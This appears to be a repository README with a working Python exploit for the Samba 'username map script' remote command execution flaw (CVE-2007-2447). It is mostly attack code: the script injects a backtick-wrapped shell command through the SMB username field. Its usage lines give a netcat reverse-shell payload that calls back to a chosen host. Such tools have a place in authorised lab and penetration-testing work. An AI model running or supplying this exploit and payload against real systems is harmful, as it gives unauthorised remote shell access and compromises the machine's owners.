CVE-2007-2447 in Python
Description
Python implementation of ‘Username’ map script’ RCE Exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).
Usage
python3 smbExploit.py <IP> <PORT> <PAYLOAD>
- IP - Ip of the remote machine.
- PORT - (Optional) Port that smb is running on.
- PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.
Examples:
python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'
python3 smbExploit.py 192.168.1.2 'nc -e /bin/sh 192.168.1.1 4444'
Code
#
# Samba 3.0.20 < 3.0.25rc3
# 'Username' map script' RCE Exploit
# by Ziemni
#
#!/usr/bin/python3
import sys
try:
from smb.SMBConnection import SMBConnection
except:
print("pysmb is not installed: python3 -m pip install pysmb")
quit()
if not (2 < len(sys.argv) < 5):
print("Usage:")
print(" python3 smbExploit.py <IP> <PORT> <PAYLOAD>")
print(" IP - Ip of the remote machine.")
print(" PORT - (Optional) Port that smb is running on.")
print(" PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.")
print("")
print("Example: python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'")
quit()
if len(sys.argv) == 3:
ip = sys.argv[1]
port = 139
payload = sys.argv[2]
else:
ip = sys.argv[1]
port = sys.argv[2]
payload = sys.argv[3]
user = "`" + payload + "`"
conn = SMBConnection(user, "na", "na", "na", use_ntlm_v2=False)
try:
print("[*] Sending the payload")
conn.connect(ip, int(port))
print("[*] Payload was send successfully")
quit()
except Exception as e:
print("[*] Something went wrong")
print("ERROR:")
print(e)
quit()
Resources
CVE-2007-2447: Remote Command Injection Vulnerability
Samba 3.0.20 < 3.0.25rc3 - ‘Username’ map script’ Command Execution (Metasploit)